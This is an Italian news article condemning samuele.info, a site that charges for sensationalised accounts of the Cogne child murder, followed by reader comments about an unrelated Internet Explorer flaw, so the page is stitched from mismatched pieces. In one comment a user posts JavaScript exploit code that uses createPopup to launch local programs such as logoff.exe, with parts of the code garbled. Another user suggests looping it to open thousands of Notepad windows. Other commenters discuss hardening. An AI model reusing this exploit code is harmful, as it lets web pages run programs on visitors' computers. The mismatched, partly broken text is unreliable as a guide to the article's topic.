Massì, chiudiamo il sito su Samuele

di L. Assenti. La tragedia di Cogne sfruttata biecamente per specularci sopra via internet. Un'operazione che attira attenzioni sul sito e la scomunica di una parlamentare, che ne chiede la chiusura. Come non essere d'accordo?


Roma – “Il sito su Samuele”, lo chiamano ormai così quei media che hanno scoperto l’esistenza di samuele.info, uno spazio web decisamente disgustoso, se non altro perché lucra con bassezza sulla tragica fine di Samuele e sul tremendo destino di quella famiglia di Cogne.

Se ne possono trovare tante, su quel sito, che si fa fatica a mandar giù. Come il raccontino iniziale, una pseudo-ricostruzione dei momenti dell’assassinio priva di qualsiasi attendibilità. Inevitabilmente si salta sulla sedia quando, finita di leggere l’orripilante introduzione si scopre che:

Per ricevere in posta elettronica, sotto forma di documento PDF leggibile con Acrobat Reader, la storia dell’infanticidio di Samuele Lorenzi e gli aggiornamenti delle indagini per 30 giorni è necessario corrispondere una quota di abbonamento pari a 15 Euro.

Un’operazione di un insopportabile furbo cinismo, che trasforma in fiction una storia drammatica per poi triturare ogni umanità e rivendere i resti spacciandoli per storie vere ad aspiranti voyeur del macabro.

Si potrebbe continuare, parlando delle fotografie appese qua e là in una cronologia delirante, dei dati personali da fornire per ottenere pillole di follia a pagamento o dei numeri fasulli del sito. Il counter nella home page mentre scrivo parla di 10mila visitatori fino a questo momento, più o meno, ma il “referendum” che si tiene in una pagina interna sulla domanda chiave “Ritenete utile la pubblicazione di questo sito” parla di più di 13mila votanti (con una netta maggioranza che boccia il sito stesso).

A voler tirar le somme, è un sito di cattivissimo gusto, realizzato con un HTML elementare in fretta e furia “per cogliere l’attimo” e sfruttare questo lungo periodo in cui il caso di Samuele è sotto i riflettori dei media.

Non sorprende che ieri, stando ad alcune agenzie, la presidente della Commissione parlamentare per l’infanzia Maria Burani Procaccini (Forza Italia) abbia chiesto la chiusura di queste pagine. Ma occorre stare attenti: l’orrore non basta per giustificare la chiusura di un sito, ci vuole un reato vero, altrimenti si corre il rischio di creare maldestri precedenti.

Lamberto Assenti

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    PAGINA HTML CHE CANCELLA XP
    Mentre navigavo mi si bloccato il sistema (XP) e nn mi si è più avviato. Ho dovuto reinstallarlo.poco dopo ho scoperto che tutto questo era possibile grazie ad un semplice script della guida di windows...:( dopo questa esperienza sono passato di filata a Linux!
    • Anonimo scrive:
      Re: PAGINA   HTML   CHE   CANCELLA   XP
      - Scritto da: PINCOPALLINO
      Mentre navigavo mi si bloccato il sistema
      (XP) e nn mi si è più avviato. Ho dovuto
      reinstallarlo.
      poco dopo ho scoperto che tutto questo era
      possibile grazie ad un semplice script della
      guida di windows...:(
      dopo questa esperienza sono passato di
      filata a Linux!e quale sarebbe questo script?
  • Anonimo scrive:
    IE6 Nuova Barra Degli Strumenti
    Navigando a caso, stavo cercando per tentantativi il sito di una tv locale, provando a scrivere il nome della emittente e varie estenzioni .com .it .tv, ecc.. Quando ad u n certo punto uno di essi e purtroppo non ricordo quale ha iniziato ad aprirmi una raffica di pop-up bloccandomi temporaneamente la navigazione. Contemporaneamente il mio computer ha iniziato ad emettere una serie di segnali sonori acuti, di quelli che provengono dalla torre. Il risultato dopo circa un minuto è stato l'aggiunta di una nuova barra di navigazione nel menu di IE6 che aveva un motore di ricerca e alcuni link. Inoltre cliccando col tasto destro proprio sulla barra oltre alla possibile scelta fra "pulsanti standard" "barra degli indirizzi" e "collegamenti" potevo scegliere una quarta opzione senza nome!E' possibile tutto questo? E' possibile che pur non volendolo una semplice pagina web possa istallare componenti di IE aggiuntivi?SalutiIacopo -NoCode-
    • Anonimo scrive:
      Re: IE6 Nuova Barra Degli Strumenti
      erh... si'.Altro esempio, la barra di google... ma almeno la' la cosa avviene su tua specifica richiesta ^_-
      • Anonimo scrive:
        Re: IE6 Nuova Barra Degli Strumenti
        - Scritto da: ZeD
        erh... si'.

        Altro esempio, la barra di google... ma
        almeno la' la cosa avviene su tua specifica
        richiesta ^_-Ma e` assurdo. Non staremo andando troppo oltre?Gia` dare la possibilita` ai siti di aprirti la pubblicita` a tutto schermo... Ma qui si gioca col fuoco, non e` una questione di sicurezza ma di rischio...
        • Anonimo scrive:
          Re: IE6 Nuova Barra Degli Strumenti
          è proprio vero.....stiamo andando oltre. Le associazioni dei consumatori dovrebbero farsi sentire!!!Andando di questo passo noi compreremo il PC e lo useranno gli altri
    • Anonimo scrive:
      Re: IE6 Nuova Barra Degli Strumenti
      - Scritto da: Iacopo -NoCode-
      Navigando a caso, CUT
      Quando ad un certo punto uno di essi e
      purtroppo non ricordo quale ha iniziato ad
      aprirmi una raffica di pop-up bloccandomi
      temporaneamente la navigazione.CUT
      stato l'aggiunta di una nuova barra di
      navigazione nel menu di IE6 che aveva un
      motore di ricerca e alcuni link.CUT
      E' possibile tutto questo? E' possibile che
      pur non volendolo una semplice pagina web
      possa istallare componenti di IE aggiuntivi?Naviga in protezione alta la prossima volta se vai a casaccio.Dato hai IE6, metti alta anche la Privacy così eviti i cookies.
  • Anonimo scrive:
    e [OP] ma basta con la pubblicita di DB2 non se ne
    puo più ma quello che fa girare ancora di più le gonadi e la promessa di maggior sicurezza specifichiamo please, sicurezza dagli hacheronzoli (ma se non erro i db dovrebbe per loro stessa natura stare dietro una DMZ quindi fuori da qualunque attacco poi c'è sempre il pir.. che lo istalla sul server web ma questi sono casi pietosi) oppure sicurezza nel non perdere i dati peccato che lavoro in un ced dove sfortunatamente sta ca.... viene usata e le notti che ho passato per ripristinare dati persi le metterei tutte in conto alla IBLemme.
    • Anonimo scrive:
      Re: e [OP] ma basta con la pubblicita di DB2 non s
      - Scritto da: basta
      persi le metterei tutte in conto alla
      IBLemme. usa mysql che e' gpl e quindi e' meglio
  • Anonimo scrive:
    basta avere un antivirus aggiornato
    e non si spegne proprio nulla:-)
  • Anonimo scrive:
    SITO PIRATA!!!
    www.tailot.cjb.net dacci una mano
  • Anonimo scrive:
    Windows - Linux 10-0
    quel baracchino piantaprocessi di linux è indietro anni luce...Windows si può anche spegnere da solo e via web.. come lo sfornatutto, (toast, pizzette e si pulisce da solo)
    • Anonimo scrive:
      Re: Windows - Linux 10-0
      - Scritto da: carpediem
      quel baracchino piantaprocessi di linux è
      indietro anni luce...No no, di piu`, io direi parsec !
      Windows si può anche spegnere da solo e via
      web.. come lo sfornatutto, (toast, pizzette
      e si pulisce da solo)Tutto qui ?io direi che la Microsoft ha fatto di piu` !Pensa, adesso conoscendo queste cose puoi anche formattarti il pc da remoto !!!Altro che ssh !!!
      • Anonimo scrive:
        Re: Windows - Linux 10-0
        - Scritto da: Memo Remigi

        Windows si può anche spegnere da solo e
        via

        web.. come lo sfornatutto, (toast,
        pizzette

        e si pulisce da solo)

        Tutto qui ?
        io direi che la Microsoft ha fatto di piu` !
        Pensa, adesso conoscendo queste cose puoi
        anche formattarti il pc da remoto !!!si chiama innovazione
  • Anonimo scrive:
    La soluzione esiste
    Andate nel registry HKCUla chiave da modificare e'software\microsoft\windows\currentversion\\internet setting\zones\0\1004mettegli il valore "3" ..dovrebbe esserci "0"problema risoltoe poi testatelo su http://security.greymagic.com/adv/gm001-ie/(e li' che ho letto come fare)(comunque linux rimane la scelta migliore)
    • Anonimo scrive:
      Re: La soluzione esiste
      - Scritto da: mello73
      Andate nel registry HKCU

      la chiave da modificare e'

      software\microsoft\windows\currentversion\
      \internet setting\zones\0\1004

      mettegli il valore "3" ..dovrebbe esserci "0"

      problema risolto

      e poi testatelo su

      http://security.greymagic.com/adv/gm001-ie/
      -poi buttate quel grigio malassemblato- comperate un mac: fine dei problemi
      • Anonimo scrive:
        Re: La soluzione esiste
        a parte quello di essere schiavi di una casa software che ha il coraggio di citare x danni chi copia il look della sua interfaccia!!!!!!!
        • Anonimo scrive:
          Re: La soluzione esiste
          - Scritto da: mello73
          a parte quello di essere schiavi di una casa
          software che ha il coraggio di citare x
          danni chi copia il look della sua
          interfaccia!!!!!!! e fanno anche bene! credo che chiunque si stuferebbe svedendosi pedissequamente copiare male tutto quello che sviluppa!
    • Anonimo scrive:
      Re: La soluzione esiste
      Io ne ho un'altra (anche se vale solo per winnt in su): usate un profilo-utonto quando navigate in Internet o scaricate posta (come anche Linux intima ai razzoni che usano sempre root).Il programma (IE, Outlook), girando in un contesto limitato, non riesce ad eseguire la maggior parte delle operazioni che richiedono accessi con privilegi di amministratore.Ho verificato:con un profilo-utonto, i test di quella pagina non vanno, come admin si' !Ciao!- Scritto da: mello73
      Andate nel registry HKCU

      la chiave da modificare e'

      software\microsoft\windows\currentversion\
      \internet setting\zones\0\1004

      mettegli il valore "3" ..dovrebbe esserci "0"

      problema risolto

      e poi testatelo su

      http://security.greymagic.com/adv/gm001-ie/

      (e li' che ho letto come fare)


      (comunque linux rimane la scelta migliore)
      • Anonimo scrive:
        Re: La soluzione esiste
        puo' essere come dici tu .. pero' attento ... il test che c'e di default su quella pagina non funziona su XP per il semplice motivo che cerca di eseguire c:\winnt\system32\calc.exementre con XP (salvo upgrade da nt4 o 2k) la dir si chiama windows (come nella serie 9x me) ...per testartlo a dovere dovresti usare il test avanzato e mettere il giusto percorso...
        • Anonimo scrive:
          Re: La soluzione esiste
          Io uso Windows 2000 Srv con AD, con tanto di c:\winnt\system32\calc.exe al suo posto: ti assicuro che come profilo-utonto non va ne' il test base ne' l'avanzato.Pardon, specifico che il profilo-utonto appartiene solo ad un proprio gruppo e non ai Domain User di default.E' un minimo di hardening, ma e' bastato... Ti diro' di piu': io sono connesso come Admin ed ho semplicemente lanciato IE con "runas utonto ... " : piu' liscio di cosi'.. :-)Ciao!
          per testartlo a dovere dovresti usare il
          test avanzato e mettere il giusto
          percorso...
          • Anonimo scrive:
            Re: La soluzione esiste
            ok ok .....era solo una precisazione ....magari uno lo prova con XP non funziona e si illude di essere al sicurocia
          • Anonimo scrive:
            Re: La soluzione esiste
            No no, hai fatto bene a precisare: mi sono tolto un dubbio in piu' anch'io ;-)Ciao!
        • Anonimo scrive:
          Re: La soluzione esiste
          in +, se non viene eseguito xchè è uno script...si può inserire il codice malefico anche in un codice xml all'interno dell'html...funziona lo stesso...anzi...pure meglio......ehm...netscape 6.2 non è per niente male, e adesso sta pure per uscire mozilla 1.0 ... ;-)))*-)
  • Anonimo scrive:
    Ma ogni settimana ce ne e` uno nuovo ???
    Ma dai cribbio, come e` possibile ?Qui si rasente il ridicolo ( o il patetico ?) !!!E non venitemi a parlare di zlib, rileggetivi i post degli altri !
    • Anonimo scrive:
      Re: Ma ogni settimana ce ne e` uno nuovo ???
      c'è di più: possibile che ogni singolo software di Windows possa essere usato per fare danni?Exploreroutlookmediaplayeretc.etc.a quando la scoperta che attraverso notepad si può riformattare in remoto un PC?ma per piacere!
  • Anonimo scrive:
    Vero!
    Mi è successo tre volte!
  • Anonimo scrive:
    ma si puo continuare cosi?
    secondo voi si puo continuare ad utilizzare software che anno questi bug????? secondo me no!!!
    • Anonimo scrive:
      Re: ma si puo continuare cosi?
      beh e che dire delle ultime falle su linux?....DM
      • Anonimo scrive:
        Re: ma si puo continuare cosi?
        - Scritto da: DM
        beh e che dire delle ultime falle su
        linux?....Beh, accendi il cervello prima di parlare, grazie...http://slashdot.org/articles/02/03/14/2125221.shtml?tid=172Anche m$ usa la zlib.
      • Anonimo scrive:
        Re: ma si puo continuare cosi?
        Che mentre M$ nn ha patchato un problema che risale al 2000 tutti i vendor delle distribuzioni Linux ( nnche` gli autori della zlib, tra l'altro usata anche su prodotti M$ ) avevano la patch pronta dopo *due* ( di numero ) giorni.Cordialmente- Scritto da: DM
        beh e che dire delle ultime falle su
        linux?....

        DM
      • Anonimo scrive:
        Re: ma si puo continuare cosi?
        - Scritto da: DM
        beh e che dire delle ultime falle su
        linux?....per esempio si potrebbe dire che non si può sfruttare con un po di JavaScript su una pagina Web... e anche con un po' di codice C non è che sia così facile, visto che l'exploit ancora non esiste...
        • Anonimo scrive:
          Re: ma si puo continuare cosi?
          ah e anche che il baco non riguarda solo Linux, ma centinaia di applicazioni Open Source e Closed Source di decine di aziende diverse
    • Anonimo scrive:
      Re: ma si puo continuare cosi?
      - Scritto da: io
      secondo voi si puo continuare ad utilizzare
      software che ANNO questi bug????? secondo me
      no!!!ANNO nel senso che sono anni che ce li hanno e continuano a rimaneree noi a comprarePS: di solito sono io che faccio gli errori, stavolta non ho resistito a fare il gioco di parole :-)
  • Anonimo scrive:
    A me un e-mail mi faceva riavviare il Window ME
    Mi era capitato di ricevere un e-mail in outlook.Ebbene ogni volta che la visualizzavo il PC mi si resettava, fino a che dopo vari tentativi sono riuscito a cancellarla? L'e-mail cmq non sono mai riuscito a leggerla (praticamente non facevo in tempo)Cosa potrebbe essere?
    • Anonimo scrive:
      Re: A me un e-mail mi faceva riavviare il Window M
      Il computer si chiudeva regolarmente, eseguendo da solo le operazioni di shutdown come se tu gli avessi comandato l'arresto del sistema con l'apposito comando, oppure lo schermo diventava improvvisamente nero e il computer si riavviava di botto, rendendo poi necessaria anche un'operazione di scandisk per verificare che non vi fossero danni ai file memorizzati sul disco rigido?Nel primo caso, potrebbe trattarsi proprio della vulnerabilità descritta nell'articolo (che è vecchia di anni, anche se ora sembra tornare alla ribalta), anche se effettivamente non so se su Win ME sia applicabile nella forma descritta.In caso contrario, si tratta evidentemente di un qualche altro tipo di difetto. In mancanza di altri elementi, può anche darsi che non fosse una cosa intenzionale da parte del mittente o comunque l'effetto diretto o indiretto causato da un codice malizioso scritto appositamente allo scopo. A me è capitato spesso, usando Win 98, che il sistema davanti a qualcosa di "critico" si resettasse di botto.
  • Anonimo scrive:
    Ecco l'exploit
    Davvero banale, è stato discusso su ioProgrammo di questo mese (Marzo 2002): var programName = new Array( "c:/windows/system32/logoff.exe", "c:/winnt/system32/logoff.exe");function exploit(){ var oPopup = window.createPopup(); var oPopBody = oPopup.document.body; var n, html = ""; for(n = 0; n < programName.length; n++) { html += " "; } oPopBody.innerHTML=html; oPopup.show(290, 190, 200, 200, document.body);} Funziona su Explorer 6, anche con Win XP. Non ancora patchato, benché noto da parecchio tempo.Ovviamente, "logoff.exe" è solo una delle alternative più "scherzose"... In realtà, può eseguire qualsiasi programma presente sull'hard disk, come giustamente riportato nell'articolo di PI.CLAP CLAP, Microsoft!
    • Anonimo scrive:
      Re: Ecco l'exploit
      Dimenticavo, se lo volete testare in una pagina HTML, ricordatevi di mettere Divertitevi poi a digitare i percorsi di altri programmi sul vostro hard disk.
    • Anonimo scrive:
      Re: Ecco l'exploit
      OK, lo tengo per imparare, pero' da quello che vedo basterebbe:1. installare windows in una cartella con un nome non standard2. spostare/rinominare il file in questione (tsk tsk)3. cambire le permissions sul file, affinche' solo gli administrator possano utilizzarlo4. finalmente navigare ed utilizzare il PC nel contesto di un utente normale (anche Linux ti insulta se "giochi" sempre come root... ;-)A questo punto l'utente, ed il browser eseguito nel suo contesto, pur navigando, non avrebbe il diritto di eseguire il file in questione.Cosa ne pensi ?Va a finire che basterebbe usare utenze appropriate per gli usi specifici (navigo come utente-nullatenente e amministro come root [o faccio un runas o un su...])Ciao!- Scritto da: Svitato
      Davvero banale, è stato discusso su
      ioProgrammo di questo mese (Marzo 2002):


      var programName = new Array(
      "c:/windows/system32/logoff.exe",
      "c:/winnt/system32/logoff.exe"
      );

      function exploit(){
      var oPopup = window.createPopup();
      var oPopBody = oPopup.document.body;
      var n, html = "";
      for(n = 0; n < programName.length; n++) {
      html += " nell'articolo di PI.

      CLAP CLAP, Microsoft!
      • Anonimo scrive:
        Re: Ecco l'exploit

        Cosa ne pensi ?Ovviamente hai ragione. Questo exploit, è facile vederlo, non ha le carte in regola per nuocere a chi usa il proprio PC con un minimo di consapevolezza. Ma quanti, tra gli utenti a rischio, sanno come attuare uno soltanto dei punti da te specificati? Ahimé, credo che solo una minoranza sia in grado. Per questo una patch mi sembra il minimo che Microsoft possa fare. Comunque, si può sempre suggerire ai propri amici sventurati ed "inesperti" l'installazione di Mozilla ;-)
        Va a finire che basterebbe usare utenze
        appropriate per gli usi specificiInfatti uno dei pregi di Win XP sta proprio nell'avere, per la prima volta, una gestione delle utenze fatta come si deve, che Linux ha invece dall'alba dei tempi. Bisognerebbe però addestrare l'utente medio all'uso di questa caratteristica.Ti faccio un esempio. Poco tempo fa ho preso un PC nuovo, con tanto di licenza di XP inclusa. L'ho acquistato presso una grande catena italiana. Quando mi è stato consegnato, il PC aveva un solo utente configurato identificato con il mio nome, e ovviamente tale utente gode dei diritti di amministrazione.Un po' di accortezza da parte dei rivenditori potrebbe aiutare gli acquirenti inesperti ad una più corretta configurazione e ad un più sicuro uso del sistema operativo. Non che questo sminuisca i problemi che spesso sorgono, ma almeno gli exploit avrebbero certamente minore efficacia.Sei d'accordo?
        • Anonimo scrive:
          Re: Ecco l'exploit

          Ti faccio un esempio. Poco tempo fa ho preso
          un PC nuovo, con tanto di licenza di XP
          inclusa. L'ho acquistato presso una grande
          catena italiana. Quando mi è stato
          consegnato, il PC aveva un solo utente
          configurato identificato con il mio nome, e
          ovviamente tale utente gode dei diritti di
          amministrazione.
          Un po' di accortezza da parte dei
          rivenditori potrebbe aiutare gli acquirenti
          inesperti ad una più corretta configurazione
          e ad un più sicuro uso del sistema
          operativo. Non che questo sminuisca i
          problemi che spesso sorgono, ma almeno gli
          exploit avrebbero certamente minore
          efficacia.

          Sei d'accordo?Assolutamente si!Ma sai quante volte ho dovuto impormi perche' gli utenti insistevano ad avere diritti di amministrazione anche sulle workstation Windows NT 4.0 ? Altrimenti come cavolo facevano ad installare i loro "programmini" ?E poi si lamentano se uno script gli resetta il pc...Se ti levano i freni alla macchina, o sei Socmaker o alla prima curvetta sei fuori strada... ;-)Ciao!
      • Anonimo scrive:
        Re: Ecco l'exploit
        - Scritto da: Gianluca70
        1. installare windows in una cartella con un
        nome non standardSe per ogni exploit cambiamo cartella a windows ......senza contare che tanti programmi legali non usano la system root ma c:windows (ho il disco principale in E: me ne accorgo spesso)
        2. spostare/rinominare il file in questione
        (tsk tsk)Il problema è che non esiste un file in questione in quanto tutti gli eseguibili di sistema sono vulnerabili,non fermarti al logoff.exe
        3. cambire le permissions sul file,
        affinche' solo gli administrator possano
        utilizzarloSacrosanto
        4. finalmente navigare ed utilizzare il PC
        nel contesto di un utente normale (anche
        Linux ti insulta se "giochi" sempre come
        root... ;-)
        A questo punto l'utente, ed il browser
        eseguito nel suo contesto, pur navigando,
        non avrebbe il diritto di eseguire il file
        in questione.GiustoSaluti
      • Anonimo scrive:
        Re: Ecco l'exploit
        io sincermente penso che con un buco del genere puoi causare danni anche senza avere permessi da amministratore...basta ad esempio applicare un semplicissimo ciclo for alla funzioncina di cui sopra ed aprire ... uhm ... diciamo 150000 sessioni di notepad...se non ti si pianta il pc prima, voglio vederti a chiuderle tutte...*-D
        • Anonimo scrive:
          Re: Ecco l'exploit
          Giusta obiezione, ma ti riporto un mio msg che troverai in un altro thread (lo so che non e' fine autocitarsi... ;-)
          • Anonimo scrive:
            Re: Ecco l'exploit
            idem: *-))
          • Anonimo scrive:
            Re: Ecco l'exploit
            Ci sto ! :-)Fammi 'sta pagina che vengo a visitarla... ;-)Aspetto con ansia !Ciao!
          • Anonimo scrive:
            Re: Ecco l'exploit
            http://security.greymagic.com/adv/gm001-ie/mmm...forse l'hanno già postato sto link...*-)
          • Anonimo scrive:
            Re: Ecco l'exploit
            ...e' proprio li' che ho provato :-)Ciao!
          • Anonimo scrive:
            Re: Ecco l'exploit
            puoi' sempre usare "runas"
          • Anonimo scrive:
            Re: Ecco l'exploit
            posso sempre usare Mozilla/Netscape, se è per quello...;-D
          • Anonimo scrive:
            Re: Ecco l'exploit
            o lynx (o links x i frame) ;-)
          • Anonimo scrive:
            Re: Ecco l'exploit [OT]
            lynx? sì, vabbè...ironia a parte...le ultime build di mozilla sono molto carine...se è un po' che non lo provi ti consiglio di installartelo (ormai sono quasi al livello di explorer), e sai bene che l'open source è garanzia di sicurezza...quasi sempre...;-)))*-)
          • Anonimo scrive:
            Re: Ecco l'exploit [OT]
            la mia non era ironia ........o almeno ..solo un po' ;-)) comunque utilizzo anche linux .... e conosco bene il mondo opensource(fai conto che la prima versione che ho installato e' stata la 1.X da floppy!!!! )
          • Anonimo scrive:
            Re: Ecco l'exploit [OT]
            - Scritto da: mello73
            la mia non era ironia ........o almeno
            ..solo un po' ;-))

            comunque utilizzo anche linux .... e conosco
            bene il mondo opensource

            (fai conto che la prima versione che ho
            installato e' stata la 1.X da floppy!!!! )Ma sta zitto va...La versione 1.x di linux... ma che dici??Linux e' il kernel, e linux =! distribuzioni.E un qualsiasi utente linux non direbbe mai "Il primo linux che ho installato e' il kernel 1.x" ma direbbe "la prima distribuzione che ho installato e' stata 1.x.Almeno risparmiamocele ste figure..Anonymous
        • Anonimo scrive:
          Re: Ecco l'exploit
          usi un bel programma da line di comando tipo "pv"roba tipo "pv -k notepad*" e sei a posto ;-)))))
          • Anonimo scrive:
            Re: Ecco l'exploit
            PV ? Non e' il PerfView di Openview, vero ?Dove lo trovo, 'sto ammazzasettete ? ;-)))Grazie!
          • Anonimo scrive:
            Re: Ecco l'exploit
            no e' il PrcView ..ci puoi fare un sacco di cose carine e tutte da line di comando ... tipo combiare la priorita' di un processo, vedere che processi usano una certa dll, vedere che dll usa un certo processo .. e cosi' via.....lo trovi a http://www.teamcti.com/products.htmovviamente e' freeinvece se vai su http://www.sysinternals.com/ci puoi trovare altre utili utility freeware (se non sono utili che utility sono ;-))) )....una per tutte i ps tools ... (permettono di fare controlli ed operazioni su macchina in locale o via rete)
          • Anonimo scrive:
            Re: Ecco l'exploit
            Cavoli, da dove avevo scaricato Process Explorer per GUI ed un po' di altra roba (ma non avevo avuto tempo di testarla, mannaggia a me !!)Mi cospargo di cenere e ti ringrazio !
  • Anonimo scrive:
    giugno 2000?????
    Non male.. non male..click qui graziehttp://www.microsoft.com/Ora potete spegnere il computer
Chiudi i commenti